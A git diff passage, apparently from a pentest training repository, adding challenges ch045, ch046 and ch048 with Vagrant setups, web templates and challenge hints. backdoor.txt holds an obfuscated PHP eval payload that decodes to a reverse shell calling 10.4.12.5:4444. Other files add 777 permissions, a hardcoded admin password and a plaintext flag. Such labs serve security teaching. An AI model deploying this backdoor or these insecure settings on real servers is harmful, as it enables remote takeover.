+ # Share an additional folder to the guest VM. The first argument is
+ # the path on the host to the actual folder. The second argument is
+ # the path on the guest to mount the folder. And the optional third
+ # argument is a set of non-required options.
+ # config.vm.synced_folder "../data", "/vagrant_data"
+
+ # Provider-specific configuration so you can fine-tune various
+ # backing providers for Vagrant. These expose provider-specific options.
+ # Example for VirtualBox:
+ #
+ # config.vm.provider "virtualbox" do |vb|
+ # # Display the VirtualBox GUI when booting the machine
+ # vb.gui = true
+ #
+ # # Customize the amount of memory on the VM:
+ # vb.memory = "1024"
+ # end
+ #
+ # View the documentation for the provider you are using for more
+ # information on available options.
+
+ # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies
+ # such as FTP and Heroku are also available. See the documentation at
+ # https://docs.vagrantup.com/v2/push/atlas.html for more information.
+ # config.push.define "atlas" do |push|
+ # push.app = "YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME"
+ # end
+
+ # Enable provisioning with a shell script. Additional provisioners such as
+ # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the
+ # documentation for more information about their specific syntax and use.
+ # config.vm.provision "shell", inline: <<-SHELL
+ # sudo apt-get update
+ # sudo apt-get install -y apache2
+ # SHELL
+end
diff --git a/challenges/ch045/index.php b/challenges/ch045/index.php
new file mode 100755
index 00000000..8413b845
--- /dev/null
+++ b/challenges/ch045/index.php
@@ -0,0 +1,5 @@
+
diff --git a/challenges/ch045/inside/backdoor.txt b/challenges/ch045/inside/backdoor.txt
new file mode 100755
index 00000000..344e9f67
--- /dev/null
+++ b/challenges/ch045/inside/backdoor.txt
@@ -0,0 +1 @@
+eval(base64_decode(urldecode("%4c%79%6f%38%50%33%42%6f%63%43%41%76%4b%69%6f%76%49%47%56%79%63%6d%39%79%58%33%4a%6c%63%47%39%79%64%47%6c%75%5a%79%67%77%4b%54%73%67%4a%47%6c%77%49%44%30%67%4a%7a%45%77%4c%6a%51%75%4d%54%49%75%4e%53%63%37%49%43%52%77%62%33%4a%30%49%44%30%67%4e%44%51%30%4e%44%73%67%61%57%59%67%4b%43%67%6b%5a%69%41%39%49%43%64%7a%64%48%4a%6c%59%57%31%66%63%32%39%6a%61%32%56%30%58%32%4e%73%61%57%56%75%64%43%63%70%49%43%59%6d%49%47%6c%7a%58%32%4e%68%62%47%78%68%59%6d%78%6c%4b%43%52%6d%4b%53%6b%67%65%79%41%6b%63%79%41%39%49%43%52%6d%4b%43%4a%30%59%33%41%36%4c%79%39%37%4a%47%6c%77%66%54%70%37%4a%48%42%76%63%6e%52%39%49%69%6b%37%49%43%52%7a%58%33%52%35%63%47%55%67%50%53%41%6e%63%33%52%79%5a%57%46%74%4a%7a%73%67%66%53%42%6c%62%48%4e%6c%61%57%59%67%4b%43%67%6b%5a%69%41%39%49%43%64%6d%63%32%39%6a%61%32%39%77%5a%57%34%6e%4b%53%41%6d%4a%69%42%70%63%31%39%6a%59%57%78%73%59%57%4a%73%5a%53%67%6b%5a%69%6b%70%49%48%73%67%4a%48%4d%67%50%53%41%6b%5a%69%67%6b%61%58%41%73%49%43%52%77%62%33%4a%30%4b%54%73%67%4a%48%4e%66%64%48%6c%77%5a%53%41%39%49%43%64%7a%64%48%4a%6c%59%57%30%6e%4f%79%42%39%49%47%56%73%63%32%56%70%5a%69%41%6f%4b%43%52%6d%49%44%30%67%4a%33%4e%76%59%32%74%6c%64%46%39%6a%63%6d%56%68%64%47%55%6e%4b%53%41%6d%4a%69%42%70%63%31%39%6a%59%57%78%73%59%57%4a%73%5a%53%67%6b%5a%69%6b%70%49%48%73%67%4a%48%4d%67%50%53%41%6b%5a%69%68%42%52%6c%39%4a%54%6b%56%55%4c%43%42%54%54%30%4e%4c%58%31%4e%55%55%6b%56%42%54%53%77%67%55%30%39%4d%58%31%52%44%55%43%6b%37%49%43%52%79%5a%58%4d%67%50%53%42%41%63%32%39%6a%61%32%56%30%58%32%4e%76%62%6d%35%6c%59%33%51%6f%4a%48%4d%73%49%43%52%70%63%43%77%67%4a%48%42%76%63%6e%51%70%4f%79%42%70%5a%69%41%6f%49%53%52%79%5a%58%4d%70%49%48%73%67%5a%47%6c%6c%4b%43%6b%37%49%48%30%67%4a%48%4e%66%64%48%6c%77%5a%53%41%39%49%43%64%7a%62%32%4e%72%5a%58%51%6e%4f%79%42%39%49%47%56%73%63%32%55%67%65%79%42%6b%61%57%55%6f%4a%32%35%76%49%48%4e%76%59%32%74%6c%64%43%42%6d%64%57%35%6a%63%79%63%70%4f%79%42%39%49%47%6c%6d%49%43%67%68%4a%48%4d%70%49%48%73%67%5a%47%6c%6c%4b%43%64%75%62%79%42%7a%62%32%4e%72%5a%58%51%6e%4b%54%73%67%66%53%42%7a%64%32%6c%30%59%32%67%67%4b%43%52%7a%58%33%52%35%63%47%55%70%49%48%73%67%59%32%46%7a%5a%53%41%6e%63%33%52%79%5a%57%46%74%4a%7a%6f%67%4a%47%78%6c%62%69%41%39%49%47%5a%79%5a%57%46%6b%4b%43%52%7a%4c%43%41%30%4b%54%73%67%59%6e%4a%6c%59%57%73%37%49%47%4e%68%63%32%55%67%4a%33%4e%76%59%32%74%6c%64%43%63%36%49%43%52%73%5a%57%34%67%50%53%42%7a%62%32%4e%72%5a%58%52%66%63%6d%56%68%5a%43%67%6b%63%79%77%67%4e%43%6b%37%49%47%4a%79%5a%57%46%72%4f%79%42%39%49%47%6c%6d%49%43%67%68%4a%47%78%6c%62%69%6b%67%65%79%42%6b%61%57%55%6f%4b%54%73%67%66%53%41%6b%59%53%41%39%49%48%56%75%63%47%46%6a%61%79%67%69%54%6d%78%6c%62%69%49%73%49%43%52%73%5a%57%34%70%4f%79%41%6b%62%47%56%75%2e%49%44%30%67%4a%47%46%62%4a%32%78%6c%62%69%64%64%4f%79%41%6b%59%69%41%39%49%43%63%6e%4f%79%42%33%61%47%6c%73%5a%53%41%6f%63%33%52%79%62%47%56%75%4b%43%52%69%4b%53%41%38%49%43%52%73%5a%57%34%70%49%48%73%67%63%33%64%70%64%47%4e%6f%49%43%67%6b%63%31%39%30%65%58%42%6c%4b%53%42%37%49%47%4e%68%63%32%55%67%4a%33%4e%30%63%6d%56%68%62%53%63%36%49%43%52%69%49%43%34%39%49%47%5a%79%5a%57%46%6b%4b%43%52%7a%4c%43%41%6b%62%47%56%75%4c%58%4e%30%63%6d%78%6c%62%69%67%6b%59%69%6b%70%4f%79%42%69%63%6d%56%68%61%7a%73%67%59%32%46%7a%5a%53%41%6e%63%32%39%6a%61%32%56%30%4a%7a%6f%67%4a%47%49%67%4c%6a%30%67%63%32%39%6a%61%32%56%30%58%33%4a%6c%59%57%51%6f%4a%48%4d%73%49%43%52%73%5a%57%34%74%63%33%52%79%62%47%56%75%4b%43%52%69%4b%53%6b%37%49%47%4a%79%5a%57%46%72%4f%79%42%39%49%48%30%67%4a%45%64%4d%54%30%4a%42%54%46%4e%62%4a%32%31%7a%5a%33%4e%76%59%32%73%6e%58%53%41%39%49%43%52%7a%4f%79%41%6b%52%30%78%50%51%6b%46%4d%55%31%73%6e%62%58%4e%6e%63%32%39%6a%61%31%39%30%65%58%42%6c%4a%31%30%67%50%53%41%6b%63%31%39%30%65%58%42%6c%4f%79%42%6c%64%6d%46%73%4b%43%52%69%4b%54%73%67%5a%47%6c%6c%4b%43%6b%37")));
diff --git a/challenges/ch045/inside/iepngfix.htc b/challenges/ch045/inside/iepngfix.htc
new file mode 100755
index 00000000..54961f9b
--- /dev/null
+++ b/challenges/ch045/inside/iepngfix.htc
@@ -0,0 +1,103 @@
+
+
+
+
+
diff --git a/challenges/ch045/inside/iepngfix.php b/challenges/ch045/inside/iepngfix.php
new file mode 100755
index 00000000..6b735c77
--- /dev/null
+++ b/challenges/ch045/inside/iepngfix.php
@@ -0,0 +1,9 @@
+
\ No newline at end of file
diff --git a/challenges/ch045/inside/images/school.jpg b/challenges/ch045/inside/images/school.jpg
new file mode 100755
index 00000000..89a1c44b
Binary files /dev/null and b/challenges/ch045/inside/images/school.jpg differ
diff --git a/challenges/ch045/inside/images/schools.jpg b/challenges/ch045/inside/images/schools.jpg
new file mode 100755
index 00000000..ea701f10
Binary files /dev/null and b/challenges/ch045/inside/images/schools.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_bottom_panel_bg.jpg b/challenges/ch045/inside/images/templatemo_bottom_panel_bg.jpg
new file mode 100755
index 00000000..7f4758c0
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_bottom_panel_bg.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_comment_icon.gif b/challenges/ch045/inside/images/templatemo_comment_icon.gif
new file mode 100755
index 00000000..90e43d1a
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_comment_icon.gif differ
diff --git a/challenges/ch045/inside/images/templatemo_comment_icon.png b/challenges/ch045/inside/images/templatemo_comment_icon.png
new file mode 100755
index 00000000..bb636fcc
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_comment_icon.png differ
diff --git a/challenges/ch045/inside/images/templatemo_content_bg.jpg b/challenges/ch045/inside/images/templatemo_content_bg.jpg
new file mode 100755
index 00000000..c45a0edb
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_content_bg.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_date_bg.png b/challenges/ch045/inside/images/templatemo_date_bg.png
new file mode 100755
index 00000000..2415888b
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_date_bg.png differ
diff --git a/challenges/ch045/inside/images/templatemo_header_bg.jpg b/challenges/ch045/inside/images/templatemo_header_bg.jpg
new file mode 100755
index 00000000..beef9f03
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_header_bg.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_header_bg_blank.jpg b/challenges/ch045/inside/images/templatemo_header_bg_blank.jpg
new file mode 100755
index 00000000..70bf2af5
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_header_bg_blank.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_image_01.jpg b/challenges/ch045/inside/images/templatemo_image_01.jpg
new file mode 100755
index 00000000..1f5d236f
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_image_01.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_image_02.jpg b/challenges/ch045/inside/images/templatemo_image_02.jpg
new file mode 100755
index 00000000..ecdf43ae
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_image_02.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_left_column_title_bg.jpg b/challenges/ch045/inside/images/templatemo_left_column_title_bg.jpg
new file mode 100755
index 00000000..e3ca88ca
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_left_column_title_bg.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_menu_bg.jpg b/challenges/ch045/inside/images/templatemo_menu_bg.jpg
new file mode 100755
index 00000000..1dd8d5a2
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_menu_bg.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_thumb_01.jpg b/challenges/ch045/inside/images/templatemo_thumb_01.jpg
new file mode 100755
index 00000000..2df39773
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_thumb_01.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_thumb_02.jpg b/challenges/ch045/inside/images/templatemo_thumb_02.jpg
new file mode 100755
index 00000000..569df17e
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_thumb_02.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_thumb_03.jpg b/challenges/ch045/inside/images/templatemo_thumb_03.jpg
new file mode 100755
index 00000000..346e5f3d
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_thumb_03.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_thumb_04.jpg b/challenges/ch045/inside/images/templatemo_thumb_04.jpg
new file mode 100755
index 00000000..05db1bff
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_thumb_04.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_thumb_05.jpg b/challenges/ch045/inside/images/templatemo_thumb_05.jpg
new file mode 100755
index 00000000..629b5865
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_thumb_05.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_thumb_06.jpg b/challenges/ch045/inside/images/templatemo_thumb_06.jpg
new file mode 100755
index 00000000..ca3b599e
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_thumb_06.jpg differ
diff --git a/challenges/ch045/inside/index.php b/challenges/ch045/inside/index.php
new file mode 100755
index 00000000..33466918
--- /dev/null
+++ b/challenges/ch045/inside/index.php
@@ -0,0 +1,194 @@
+
+
+
+
+Paint Blog Template - free CSS template
+
+
+
+
+
+
This is a free CSS template provided by TemplateMo.com website. You may download, modify and apply this CSS layout for your personal or business websites.
+
Credit goes to photovaco.com for photos. Aliquam tristique lacus in sapien. Suspendisse potenti. Ut sed pede. Nullam vitae tellus. Sed ultrices. Lorem ipsum dolor sit amet, consectetuer adipiscing elit.
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus nec dui. Donec nec neque ut quam sodales feugiat. Nam vehicula dapibus lectus. Integer imperdiet pretium dolor. Vivamus felis. Vivamus vulputate vehicula mi.
+
Maecenas consectetur purus. Aliquam tristique lacus in sapien. Suspendisse potenti. Ut sed pede. Nullam vitae tellus. Sed ultrices. Lorem ipsum dolor sit amet, consectetuer adipiscing elit.
This blog layout is a free CSS template provided by TemplateMo.com website. You may download, modify and apply this CSS layout for your personal or business websites.
+
Credit goes to photovaco.com for photos. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus nec dui. Donec nec neque ut quam sodales feugiat. Nam vehicula dapibus lectus. Integer imperdiet pretium dolor.
+
Vivamus felis. Vivamus vulputate vehicula mi. Maecenas consectetur purus. Aliquam tristique lacus in sapien. Suspendisse potenti. Ut sed pede. Nullam vitae tellus. Sed ultrices. Lorem ipsum dolor sit amet, consectetuer adipiscing elit
+
+
+
+
+
Comments
+
+
1. Phasellus ultrices justo
+
+ Donec scelerisque. Integer ultrices. Donec hendrerit. Maecenas nisl ante, mollis et, tincidunt vitae, feugiat sit amet, mi. Vestibulum urna. Vivamus eu tortor.
+
+
+
+
2. Vivamus vestibulum
+
+ Aliquam tristique lacus in sapien. Suspendisse potenti. Ut sed pede. Nullam vitae tellus.
+
+
+Hints /Tips & Rules :
+Play with inputs, notice the changes carefully on the web page. You would have to analyse the backdoor that is weakly encrypted, and enter ur ip address in the payload for getting reverse connection or for accessing the server system. ".txt" cannot be executed so, might have to play with some extensions For better understanding, go through these references reference1 reference2
+]]>
+
+
+
diff --git a/challenges/ch045/setup_db/db-creds.inc b/challenges/ch045/setup_db/db-creds.inc
new file mode 100755
index 00000000..dd88e1d1
--- /dev/null
+++ b/challenges/ch045/setup_db/db-creds.inc
@@ -0,0 +1,9 @@
+
+
diff --git a/challenges/ch045/setup_db/setup-db.php b/challenges/ch045/setup_db/setup-db.php
new file mode 100755
index 00000000..f214bbb8
--- /dev/null
+++ b/challenges/ch045/setup_db/setup-db.php
@@ -0,0 +1,103 @@
+
+
+
+
+Welcome To The World of Pentesters !
+
+
+
+
+
+Welcome
+
+
+
+
+
+
+
Wait a bit.. Setting up database !
+
+
+
+";
+
+
+
+$con = mysql_connect($host,$dbuser,$dbpass);
+if (!$con)
+ {
+ die('Could not connect to DB, check the creds in db-creds.inc: ' . mysql_error());
+ }
+
+
+
+
+//@mysql_select_db('mysql',$con)
+
+//purging Old Database
+ $sql="DROP DATABASE IF EXISTS TripDawki";
+ if (mysql_query($sql))
+ {echo "Old database 'TripDawki' purged if exists"; echo "
\n";}
+
+
+
+//including the Challenges DB creation file.
+?>
+
+
+
+
+
+
diff --git a/challenges/ch045/setup_db/sql-connect.php b/challenges/ch045/setup_db/sql-connect.php
new file mode 100755
index 00000000..4570d963
--- /dev/null
+++ b/challenges/ch045/setup_db/sql-connect.php
@@ -0,0 +1,20 @@
+
+
+
+
+
+
diff --git a/challenges/ch046/E'PL.txt b/challenges/ch046/E'PL.txt
new file mode 100755
index 00000000..67b52b3a
--- /dev/null
+++ b/challenges/ch046/E'PL.txt
@@ -0,0 +1,3 @@
+flag is : thenew_flag
+
+//have to encrypt this later...
diff --git a/challenges/ch046/Vagrantfile b/challenges/ch046/Vagrantfile
new file mode 100755
index 00000000..feefb34a
--- /dev/null
+++ b/challenges/ch046/Vagrantfile
@@ -0,0 +1,84 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+# All Vagrant configuration is done below. The "2" in Vagrant.configure
+# configures the configuration version (we support older styles for
+# backwards compatibility). Please don't change it unless you know what
+# you're doing.
+Vagrant.configure(2) do |config|
+ # The most common configuration options are documented and commented below.
+ # For a complete reference, please see the online documentation at
+ # https://docs.vagrantup.com.
+
+ # Every Vagrant development environment requires a box. You can search for
+ # boxes at https://atlas.hashicorp.com/search.
+ config.vm.box = "waratek/kali-mini"
+
+ # Disable automatic box update checking. If you disable this, then
+ # boxes will only be checked for updates when the user runs
+ # `vagrant box outdated`. This is not recommended.
+ # config.vm.box_check_update = false
+
+ # Create a forwarded port mapping which allows access to a specific port
+ # within the machine from a port on the host machine. In the example below,
+ # accessing "localhost:8080" will access port 80 on the guest machine.
+ config.vm.network "forwarded_port", guest: 80, host: 8008
+
+ config.vm.provision "shell",
+ inline: "sudo rm -rf /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo ln -s /vagrant /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo chmod -R 777 /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo service mysql start"
+ #config.vm.provision "shell",
+ # inline: "sudo /usr/bin/mysql -uroot -pnewpassword -e 'SELECT CURDATE();' || /usr/bin/mysqladmin -u root password 'newpassword'"
+ config.vm.provision "shell",
+ inline: "sudo service apache2 start && sudo service mysql restart"
+
+ # Create a private network, which allows host-only access to the machine
+ # using a specific IP.
+ # config.vm.network "private_network", ip: "192.168.33.10"
+
+ # Create a public network, which generally matched to bridged network.
+ # Bridged networks make the machine appear as another physical device on
+ # your network.
+ # config.vm.network "public_network"
+
+ # Share an additional folder to the guest VM. The first argument is
+ # the path on the host to the actual folder. The second argument is
+ # the path on the guest to mount the folder. And the optional third
+ # argument is a set of non-required options.
+ # config.vm.synced_folder "../data", "/vagrant_data"
+
+ # Provider-specific configuration so you can fine-tune various
+ # backing providers for Vagrant. These expose provider-specific options.
+ # Example for VirtualBox:
+ #
+ # config.vm.provider "virtualbox" do |vb|
+ # # Display the VirtualBox GUI when booting the machine
+ # vb.gui = true
+ #
+ # # Customize the amount of memory on the VM:
+ # vb.memory = "1024"
+ # end
+ #
+ # View the documentation for the provider you are using for more
+ # information on available options.
+
+ # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies
+ # such as FTP and Heroku are also available. See the documentation at
+ # https://docs.vagrantup.com/v2/push/atlas.html for more information.
+ # config.push.define "atlas" do |push|
+ # push.app = "YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME"
+ # end
+
+ # Enable provisioning with a shell script. Additional provisioners such as
+ # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the
+ # documentation for more information about their specific syntax and use.
+ # config.vm.provision "shell", inline: <<-SHELL
+ # sudo apt-get update
+ # sudo apt-get install -y apache2
+ # SHELL
+end
diff --git a/challenges/ch046/index.php b/challenges/ch046/index.php
new file mode 100755
index 00000000..5417aaeb
--- /dev/null
+++ b/challenges/ch046/index.php
@@ -0,0 +1,27 @@
+
+
+
+OS Command Injection
+
+
+
diff --git a/challenges/ch046/newchallenge6.xml b/challenges/ch046/newchallenge6.xml
new file mode 100755
index 00000000..e83553f8
--- /dev/null
+++ b/challenges/ch046/newchallenge6.xml
@@ -0,0 +1,22 @@
+
+
+ New Challenge 6
+
+ Andreas Venieris,
+ Konstantinos Papapanagiotou,
+ Anastasios Stasinopoulos,
+ Vasilios Vlachos,
+ Rajat Moury
+ Alexandros Papanikolaou
+
+ web
+
+
+
+Hints /Tips & Rules :
+Play with inputs, notice the changes carefully, Intercept the requests and responses passed between browser and web-server. You are not allowed to see the php files before cracking the challenge. reference1 reference2
+]]>
+
+
+
diff --git a/challenges/ch046/robots.txt b/challenges/ch046/robots.txt
new file mode 100755
index 00000000..95ce820a
--- /dev/null
+++ b/challenges/ch046/robots.txt
@@ -0,0 +1,5 @@
+User-agent: *
+Disallow: /test/ad_min.php
+
+User-agent: *
+Disallow: /Important_Files
diff --git a/challenges/ch048/Vagrantfile b/challenges/ch048/Vagrantfile
new file mode 100755
index 00000000..91e41402
--- /dev/null
+++ b/challenges/ch048/Vagrantfile
@@ -0,0 +1,88 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+# All Vagrant configuration is done below. The "2" in Vagrant.configure
+# configures the configuration version (we support older styles for
+# backwards compatibility). Please don't change it unless you know what
+# you're doing.
+Vagrant.configure(2) do |config|
+ # The most common configuration options are documented and commented below.
+ # For a complete reference, please see the online documentation at
+ # https://docs.vagrantup.com.
+
+ # Every Vagrant development environment requires a box. You can search for
+ # boxes at https://atlas.hashicorp.com/search.
+ config.vm.box = "waratek/kali-mini"
+
+ # Disable automatic box update checking. If you disable this, then
+ # boxes will only be checked for updates when the user runs
+ # `vagrant box outdated`. This is not recommended.
+ # config.vm.box_check_update = false
+
+ # Create a forwarded port mapping which allows access to a specific port
+ # within the machine from a port on the host machine. In the example below,
+ # accessing "localhost:8080" will access port 80 on the guest machine.
+ config.vm.network "forwarded_port", guest: 80, host: 8008
+
+ config.vm.provision "shell",
+ inline: "sudo rm -rf /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo ln -s /vagrant /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo chmod -R 777 /var/www/html"
+ config.vm.provision "shell",
+ inline: "echo 'admin_itis' | sudo htpasswd -c -i /etc/apache2/.htpasswd1 admin"
+ config.vm.provision "shell",
+ inline: "sudo cp -f /var/www/html/dir/apache2.conf /etc/apache2/"
+ config.vm.provision "shell",
+ inline: "sudo service mysql start"
+ #config.vm.provision "shell",
+ # inline: "sudo /usr/bin/mysql -uroot -pnewpassword -e 'SELECT CURDATE();' || /usr/bin/mysqladmin -u root password 'newpassword'"
+ config.vm.provision "shell",
+ inline: "sudo service apache2 start && sudo service mysql restart"
+
+ # Create a private network, which allows host-only access to the machine
+ # using a specific IP.
+ # config.vm.network "private_network", ip: "192.168.33.10"
+
+ # Create a public network, which generally matched to bridged network.
+ # Bridged networks make the machine appear as another physical device on
+ # your network.
+ # config.vm.network "public_network"
+
+ # Share an additional folder to the guest VM. The first argument is
+ # the path on the host to the actual folder. The second argument is
+ # the path on the guest to mount the folder. And the optional third
+ # argument is a set of non-required options.
+ # config.vm.synced_folder "../data", "/vagrant_data"
+
+ # Provider-specific configuration so you can fine-tune various
+ # backing providers for Vagrant. These expose provider-specific options.
+ # Example for VirtualBox:
+ #
+ # config.vm.provider "virtualbox" do |vb|
+ # # Display the VirtualBox GUI when booting the machine
+ # vb.gui = true
+ #
+ # # Customize the amount of memory on the VM:
+ # vb.memory = "1024"
+ # end
+ #
+ # View the documentation for the provider you are using for more
+ # information on available options.
+
+ # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies
+ # such as FTP and Heroku are also available. See the documentation at
+ # https://docs.vagrantup.com/v2/push/atlas.html for more information.
+ # config.push.define "atlas" do |push|
+ # push.app = "YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME"
+ # end
+
+ # Enable provisioning with a shell script. Additional provisioners such as
+ # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the
+ # documentation for more information about their specific syntax and use.
+ # config.vm.provision "shell", inline: <<-SHELL
+ # sudo apt-get update
+ # sudo apt-get install -y apache2
+ # SHELL
+end
diff --git a/challenges/ch048/ctf.jpg b/challenges/ch048/ctf.jpg
new file mode 100755
index 00000000..a31efcdf
Binary files /dev/null and b/challenges/ch048/ctf.jpg differ
diff --git a/challenges/ch048/dir/.htaccess b/challenges/ch048/dir/.htaccess
new file mode 100755
index 00000000..f97554b1
--- /dev/null
+++ b/challenges/ch048/dir/.htaccess
@@ -0,0 +1,8 @@
+AuthType Basic
+AuthName "Protected Area !!"
+AuthUserFile /etc/apache2/.htpasswd1
+
+
+Require user admin
+
+
diff --git a/challenges/ch048/dir/apache2.conf b/challenges/ch048/dir/apache2.conf
new file mode 100755
index 00000000..0f4885e4
--- /dev/null
+++ b/challenges/ch048/dir/apache2.conf
@@ -0,0 +1,221 @@
+# This is the main Apache server configuration file. It contains the
+# configuration directives that give the server its instructions.
+# See http://httpd.apache.org/docs/2.4/ for detailed information about
+# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
+# hints.
+#
+#
+# Summary of how the Apache 2 configuration works in Debian:
+# The Apache 2 web server configuration in Debian is quite different to
+# upstream's suggested way to configure the web server. This is because Debian's
+# default Apache2 installation attempts to make adding and removing modules,
+# virtual hosts, and extra configuration directives as flexible as possible, in
+# order to make automating the changes and administering the server as easy as
+# possible.
+
+# It is split into several files forming the configuration hierarchy outlined
+# below, all located in the /etc/apache2/ directory:
+#
+# /etc/apache2/
+# |-- apache2.conf
+# | `-- ports.conf
+# |-- mods-enabled
+# | |-- *.load
+# | `-- *.conf
+# |-- conf-enabled
+# | `-- *.conf
+# `-- sites-enabled
+# `-- *.conf
+#
+#
+# * apache2.conf is the main configuration file (this file). It puts the pieces
+# together by including all remaining configuration files when starting up the
+# web server.
+#
+# * ports.conf is always included from the main configuration file. It is
+# supposed to determine listening ports for incoming connections which can be
+# customized anytime.
+#
+# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
+# directories contain particular configuration snippets which manage modules,
+# global configuration fragments, or virtual host configurations,
+# respectively.
+#
+# They are activated by symlinking available configuration files from their
+# respective *-available/ counterparts. These should be managed by using our
+# helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
+# their respective man pages for detailed information.
+#
+# * The binary is called apache2. Due to the use of environment variables, in
+# the default configuration, apache2 needs to be started/stopped with
+# /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
+# work with the default configuration.
+
+
+# Global configuration
+#
+
+#
+# ServerRoot: The top of the directory tree under which the server's
+# configuration, error, and log files are kept.
+#
+# NOTE! If you intend to place this on an NFS (or otherwise network)
+# mounted filesystem then please read the Mutex documentation (available
+# at );
+# you will save yourself a lot of trouble.
+#
+# Do NOT add a slash at the end of the directory path.
+#
+#ServerRoot "/etc/apache2"
+
+#
+# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
+#
+Mutex file:${APACHE_LOCK_DIR} default
+
+#
+# PidFile: The file in which the server should record its process
+# identification number when it starts.
+# This needs to be set in /etc/apache2/envvars
+#
+PidFile ${APACHE_PID_FILE}
+
+#
+# Timeout: The number of seconds before receives and sends time out.
+#
+Timeout 300
+
+#
+# KeepAlive: Whether or not to allow persistent connections (more than
+# one request per connection). Set to "Off" to deactivate.
+#
+KeepAlive On
+
+#
+# MaxKeepAliveRequests: The maximum number of requests to allow
+# during a persistent connection. Set to 0 to allow an unlimited amount.
+# We recommend you leave this number high, for maximum performance.
+#
+MaxKeepAliveRequests 100
+
+#
+# KeepAliveTimeout: Number of seconds to wait for the next request from the
+# same client on the same connection.
+#
+KeepAliveTimeout 5
+
+
+# These need to be set in /etc/apache2/envvars
+User ${APACHE_RUN_USER}
+Group ${APACHE_RUN_GROUP}
+
+#
+# HostnameLookups: Log the names of clients or just their IP addresses
+# e.g., www.apache.org (on) or 204.62.129.132 (off).
+# The default is off because it'd be overall better for the net if people
+# had to knowingly turn this feature on, since enabling it means that
+# each client request will result in AT LEAST one lookup request to the
+# nameserver.
+#
+HostnameLookups Off
+
+# ErrorLog: The location of the error log file.
+# If you do not specify an ErrorLog directive within a
+# container, error messages relating to that virtual host will be
+# logged here. If you *do* define an error logfile for a
+# container, that host's errors will be logged there and not here.
+#
+ErrorLog ${APACHE_LOG_DIR}/error.log
+
+#
+# LogLevel: Control the severity of messages logged to the error_log.
+# Available values: trace8, ..., trace1, debug, info, notice, warn,
+# error, crit, alert, emerg.
+# It is also possible to configure the log level for particular modules, e.g.
+# "LogLevel info ssl:warn"
+#
+LogLevel warn
+
+# Include module configuration:
+IncludeOptional mods-enabled/*.load
+IncludeOptional mods-enabled/*.conf
+
+# Include list of ports to listen on
+Include ports.conf
+
+
+# Sets the default security model of the Apache2 HTTPD server. It does
+# not allow access to the root filesystem outside of /usr/share and /var/www.
+# The former is used by web applications packaged in Debian,
+# the latter may be used for local directories served by the web server. If
+# your system is serving content from a sub-directory in /srv you must allow
+# access here, or in any related virtual host.
+
+ Options FollowSymLinks
+ AllowOverride None
+ Require all denied
+
+
+
+ AllowOverride None
+ Require all granted
+
+
+
+ Options Indexes FollowSymLinks
+ AllowOverride all
+ Require all granted
+
+
+#
+# Options Indexes FollowSymLinks
+# AllowOverride None
+# Require all granted
+#
+
+
+
+
+# AccessFileName: The name of the file to look for in each directory
+# for additional configuration directives. See also the AllowOverride
+# directive.
+#
+AccessFileName .htaccess
+
+#
+# The following lines prevent .htaccess and .htpasswd files from being
+# viewed by Web clients.
+#
+
+ Require all denied
+
+
+
+#
+# The following directives define some format nicknames for use with
+# a CustomLog directive.
+#
+# These deviate from the Common Log Format definitions in that they use %O
+# (the actual bytes sent including headers) instead of %b (the size of the
+# requested file), because the latter makes it impossible to detect partial
+# requests.
+#
+# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
+# Use mod_remoteip instead.
+#
+LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
+LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
